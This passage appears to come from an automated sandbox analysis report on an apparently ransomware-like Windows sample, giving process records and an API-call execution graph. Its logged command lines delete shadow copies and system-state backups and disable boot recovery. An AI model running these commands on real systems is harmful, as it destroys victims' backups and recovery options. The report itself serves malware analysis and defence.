                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:56
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c bcdedit /set {default} recoveryenabled No
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:57
                                                                                                          Start time:23:39:02
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c vssadmin Delete Shadows /All /Quiet
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:58
                                                                                                          Start time:23:39:04
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:59
                                                                                                          Start time:23:39:05
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:60
                                                                                                          Start time:23:39:05
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} recoveryenabled No
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:61
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:62
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:63
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\vssadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:vssadmin Delete Shadows /All /Quiet
                                                                                                          Imagebase:0x7ff67d280000
                                                                                                          File size:145'920 bytes
                                                                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:64
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:65
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c bcdedit /set {default} recoveryenabled No
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:66
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:67
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:68
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:69
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:70
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} recoveryenabled No
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:71
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:72
                                                                                                          Start time:23:39:06
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:73
                                                                                                          Start time:23:39:07
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:74
                                                                                                          Start time:23:39:07
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                          Imagebase:0x7ff7bff40000
                                                                                                          File size:329'728 bytes
                                                                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:75
                                                                                                          Start time:23:39:07
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wbadmin delete catalog -quiet
                                                                                                          Imagebase:0x7ff7bff40000
                                                                                                          File size:329'728 bytes
                                                                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:76
                                                                                                          Start time:23:39:07
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:77
                                                                                                          Start time:23:39:07
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c wmic SHADOWCOPY /nointeractive
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:78
                                                                                                          Start time:23:39:07
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\wbadmin.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                                                                                                          Imagebase:0x7ff7bff40000
                                                                                                          File size:329'728 bytes
                                                                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:79
                                                                                                          Start time:23:39:08
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:80
                                                                                                          Start time:23:39:08
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:81
                                                                                                          Start time:23:39:08
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:82
                                                                                                          Start time:23:39:08
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\bcdedit.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          Imagebase:0x7ff79cca0000
                                                                                                          File size:491'864 bytes
                                                                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:83
                                                                                                          Start time:23:39:08
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                                                                                                          Imagebase:0x7ff65aac0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:84
                                                                                                          Start time:23:39:08
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:96
                                                                                                          Start time:23:39:15
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:108
                                                                                                          Start time:23:39:18
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:111
                                                                                                          Start time:23:39:19
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:117
                                                                                                          Start time:23:39:20
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:123
                                                                                                          Start time:23:39:20
                                                                                                          Start date:26/04/2024
                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                          Wow64 process (32bit):
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:
                                                                                                          Has administrator privileges:
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.8%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:40.4%
                                                                                                            Total number of Nodes:1380
                                                                                                            Total number of Limit Nodes:12
                                                                                                            execution_graph 5712 40ed70 5713 412920 6 API calls 5712->5713 5714 40ed8a 5713->5714 5734 401120 GdipDeleteBrush 5735 40113c 5734->5735 5737 40114e 5734->5737 5736 401140 GdipFree 5735->5736 5735->5737 5742 4010c0 GdipCloneBrush 5743 4010e2 GdipAlloc 5742->5743 5744 4010df 5742->5744 5745 401105 GdipDeleteBrush 5743->5745 5746 4010ee 5743->5746 5744->5743 5755 40f980 5762 401000 5755->5762 5757 40f9ea GetModuleHandleA GetProcAddress 5758 40fa06 5757->5758 5759 40fa14 5757->5759 5758->5759 5760 40fa30 Sleep 5758->5760 5761 40fa25 GetConsoleWindow 5758->5761 5761->5760 5763 401010 5762->5763 5763->5757 5763->5763 4280 416e10 GetPEB 4281 416e30 4280->4281 4282 416e28 ExitProcess 4280->4282 4358 416990 GetSystemDefaultUILanguage 4281->4358 4287 416e72 Sleep 4378 41aa00 GetCurrentProcess OpenProcessToken 4287->4378 4288 416e69 NtSetInformationThread 4288->4287 4294 416f22 4296 416f26 ExitProcess 4294->4296 4297 416f2e 4294->4297 4295 416e9b GetVersion 4299 416ea5 GetPEB 4295->4299 4302 416efa 4295->4302 4427 416b00 4297->4427 4314 416ebf 4299->4314 4300 416f35 NtOpenProcess 4301 416fa3 4300->4301 4315 4170b7 4300->4315 4304 4170cb 4301->4304 4305 416fae GetSecurityInfo 4301->4305 4408 40f630 4302->4408 4303 4170c4 NtClose 4303->4304 4306 4170d2 RtlFreeSid 4304->4306 4307 4170d9 NtSetInformationProcess RtlAdjustPrivilege GetCurrentProcess OpenProcessToken 4304->4307 4308 416fcd RtlAllocateAndInitializeSid 4305->4308 4305->4315 4306->4307 4310 41711c GetTokenInformation 4307->4310 4311 41713e 4307->4311 4312 416ff5 RtlQueryInformationAcl RtlLengthSid malloc 4308->4312 4308->4315 4310->4311 4317 417145 CloseHandle 4311->4317 4318 41714c CreateThread 4311->4318 4312->4315 4316 41702c RtlCreateAcl 4312->4316 4313 416f1a 4422 412870 4313->4422 4394 41a8e0 NtAllocateVirtualMemory 4314->4394 4315->4303 4315->4304 4320 4170a7 free 4316->4320 4321 41703a RtlAddAccessDeniedAce 4316->4321 4317->4318 4322 417164 NtSetInformationThread 4318->4322 4323 41716d 4318->4323 5673 4174d0 FindFirstVolumeW 4318->5673 4320->4315 4321->4320 4325 41704c 4321->4325 4322->4323 4326 417171 CreateThread 4323->4326 4327 417196 4323->4327 4324 416ee7 4400 41a740 CoInitializeEx 4324->4400 4329 417093 SetSecurityInfo 4325->4329 4333 417060 RtlGetAce 4325->4333 4326->4327 4330 41718b NtSetInformationThread 4326->4330 4442 419330 4327->4442 4329->4320 4330->4327 4333->4320 4335 417075 RtlAddAce 4333->4335 4334 41719e 4336 4171c9 GetTickCount 4334->4336 4339 4171a2 4334->4339 4335->4320 4335->4325 4461 40fe80 RtlInitializeCriticalSection CreateThread 4336->4461 4341 40f630 14 API calls 4339->4341 4340 417243 4342 40f630 14 API calls 4340->4342 4343 4171be ExitProcess 4341->4343 4344 417249 4342->4344 4481 411e40 GdiplusStartup 4344->4481 4346 417280 4522 411a80 4346->4522 4348 417285 4349 416b00 23 API calls 4348->4349 4350 41728f GetConsoleWindow IsWindowVisible 4349->4350 4351 4172d1 NtWaitForSingleObject 4350->4351 4354 4172a0 4350->4354 4538 416ce0 GetPEB 4351->4538 4353 4172e1 ExitProcess 4355 40f630 14 API calls 4354->4355 4356 4172c4 4355->4356 4537 412590 Sleep 4356->4537 4359 416ae9 ExitProcess 4358->4359 4360 4169aa 4358->4360 4360->4359 4361 416a60 GetUserDefaultUILanguage 4360->4361 4361->4359 4362 416a6e 4361->4362 4362->4359 4363 416af1 RtlInitializeCriticalSection 4362->4363 4364 40fdb0 GetPEB CommandLineToArgvW 4363->4364 4365 40fde6 CreateThread 4364->4365 4366 40fdef 4364->4366 4365->4287 4365->4288 5662 40f800 AllocConsole GetConsoleWindow ShowWindow 4365->5662 4367 419330 111 API calls 4366->4367 4368 40fdf4 4367->4368 4369 40fdf8 ExitProcess 4368->4369 4370 40fdff 4368->4370 4371 40fe5b 4370->4371 4373 40fe16 GetFileAttributesW 4370->4373 4376 40fe3a SetFileAttributesW 4370->4376 4543 410530 wsprintfW FindFirstFileExW 4370->4543 4633 419500 PathFindExtensionW 4370->4633 4372 40fe61 Sleep 4371->4372 4372->4372 4374 40fe6e ExitProcess 4372->4374 4373->4370 4376->4370 4379 41aa23 GetTokenInformation 4378->4379 4380 41aa45 4378->4380 4379->4380 4381 416e82 4380->4381 4382 41aa4c FindCloseChangeNotification 4380->4382 4381->4313 4383 412680 NtOpenProcessToken 4381->4383 4382->4381 4384 4126d9 CreateWellKnownSid 4383->4384 4393 4126bc 4383->4393 4385 4126f6 CheckTokenMembership 4384->4385 4384->4393 4386 41270a 4385->4386 4385->4393 4389 41270f NtQueryInformationToken 4386->4389 4386->4393 4387 412780 CloseHandle 4388 412783 4387->4388 4390 41278a CloseHandle 4388->4390 4391 41278d 4388->4391 4392 41274f CheckTokenMembership 4389->4392 4389->4393 4390->4391 4391->4295 4391->4302 4392->4393 4393->4387 4393->4388 4395 41a9a0 RtlAcquirePebLock 4394->4395 4396 41a924 GetWindowsDirectoryW 4394->4396 4398 41a9b8 4395->4398 4397 41a942 4396->4397 4397->4395 4397->4397 4399 41a9bf RtlInitUnicodeString RtlInitUnicodeString RtlReleasePebLock LdrEnumerateLoadedModules 4398->4399 4399->4324 4401 41a776 4400->4401 4729 41a570 4401->4729 4403 41a880 4404 41a8b9 CoUninitialize 4403->4404 4405 416ef2 ExitProcess 4403->4405 4404->4405 4406 41a7af 4406->4403 4407 41a570 CoGetObject 4406->4407 4407->4403 4410 40f656 4408->4410 4409 40f66d wvsprintfA wsprintfA GetLocalTime 4411 40f6f0 4409->4411 4410->4409 4410->4410 4411->4411 4412 40f6fd wsprintfA 4411->4412 4413 40f733 GetPEB RtlEnterCriticalSection SetConsoleTextAttribute 4412->4413 4414 40f725 4412->4414 4416 40f76b WriteFile SetConsoleTextAttribute 4413->4416 4417 40f75f 4413->4417 4414->4413 4415 40f7e8 4414->4415 4415->4313 4418 40f7ab WriteFile GetConsoleWindow IsWindowVisible 4416->4418 4419 40f79b 4416->4419 4417->4416 4420 40f7d4 FlashWindow 4418->4420 4421 40f7dd RtlLeaveCriticalSection 4418->4421 4419->4418 4419->4419 4420->4421 4421->4415 4423 4128b4 4422->4423 4424 4128f1 OpenMutexA 4423->4424 4425 412912 4424->4425 4426 412902 CreateMutexA 4424->4426 4425->4294 4426->4294 4733 401370 4427->4733 4429 416b53 RegCreateKeyExA 4430 416cd5 4429->4430 4431 416b7c 4429->4431 4430->4300 4432 416bf2 GetPEB 4431->4432 4433 416b98 RegDeleteValueW 4431->4433 4735 401400 4432->4735 4434 416bc0 4433->4434 4434->4434 4437 40f630 14 API calls 4434->4437 4436 416c5f wsprintfW RegQueryValueExW 4438 416c91 lstrcmpiW 4436->4438 4439 416cae RegSetValueExW 4436->4439 4440 416bda RegCloseKey 4437->4440 4438->4439 4441 416ccc RegCloseKey 4438->4441 4439->4441 4440->4300 4441->4430 4443 419341 4442->4443 4444 41938d 4443->4444 4449 40f630 14 API calls 4443->4449 4736 418620 malloc 4444->4736 4446 41939f 4447 4193a3 4446->4447 4448 4193aa GetPEB NtCreateIoCompletion 4446->4448 4447->4334 4450 4193f0 4448->4450 4449->4444 4450->4450 4451 40f630 14 API calls 4450->4451 4452 41940d 4451->4452 4453 4194bb 4452->4453 4454 419430 CreateThread 4452->4454 4457 40f630 14 API calls 4453->4457 4455 419454 CreateThread 4454->4455 4456 41944b NtSetInformationThread 4454->4456 5440 4180b0 4454->5440 4458 419478 NtSetInformationThread NtSetInformationThread 4455->4458 4459 41946f NtSetInformationThread 4455->4459 5453 4180b0 68 API calls __allrem 4455->5453 4456->4455 4460 4194ee 4457->4460 4458->4453 4458->4454 4459->4458 4460->4334 4462 40fec3 CreateThread 4461->4462 4463 40feba NtSetInformationThread 4461->4463 5468 41a450 WSAStartup 4461->5468 4464 40fef0 NtSetInformationThread 4462->4464 4465 40fef9 CreateThread 4462->4465 5484 40fab0 4462->5484 4463->4462 4464->4465 4466 40ff26 NtSetInformationThread 4465->4466 4467 40ff2f GetLogicalDrives 4465->4467 5460 40fa70 4465->5460 4466->4467 4470 40ff62 4467->4470 4468 40ff6f GetDriveTypeW 4469 40ff8c malloc 4468->4469 4468->4470 4469->4470 4471 40ffa1 wsprintfW CreateThread 4469->4471 4470->4468 4470->4469 4472 410092 Sleep WaitForMultipleObjects 4470->4472 4471->4470 4473 410065 NtSetInformationThread 4471->4473 4474 4100d3 4472->4474 4473->4470 4474->4474 4475 40f630 14 API calls 4474->4475 4476 4100ed 4475->4476 4477 4100f0 Sleep 4476->4477 4478 410106 RtlDeleteCriticalSection 4476->4478 4477->4476 4477->4477 4479 40f630 14 API calls 4478->4479 4480 410158 GetTickCount 4479->4480 4480->4340 4482 411ea0 GetSystemMetrics GetSystemMetrics 4481->4482 4483 4123c4 4481->4483 4482->4483 4484 411ebe 4482->4484 4483->4346 4484->4483 4485 411ec6 GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext 4484->4485 4486 411f1d 4485->4486 4486->4486 5621 401210 GdipCreateFontFamilyFromName 4486->5621 4488 411f66 GdipCreateStringFormat GdipSetStringFormatAlign 4489 411ff0 4488->4489 4490 411ff6 GdipSetStringFormatLineAlign 4488->4490 4489->4490 4491 41200c 4489->4491 4492 412006 4490->4492 4493 412151 GdipDeleteStringFormat GdipDeleteFont GdipDeleteGraphics GdipDisposeImage 4491->4493 4492->4491 5632 401160 GdipCreateLineBrushFromRect 4492->5632 4493->4346 4495 412040 GdipFillRectangle 4496 412064 4495->4496 4497 41206a malloc 4495->4497 4496->4497 4498 412081 4496->4498 4497->4498 4499 41208e 4497->4499 4500 412148 GdipDeleteBrush 4498->4500 4501 4120ce wsprintfW 4499->4501 4500->4493 5633 401160 GdipCreateLineBrushFromRect 4501->5633 4503 412103 5634 4011b0 4503->5634 4506 41212c free 4507 412136 4506->4507 4508 412138 GdipDeleteBrush 4507->4508 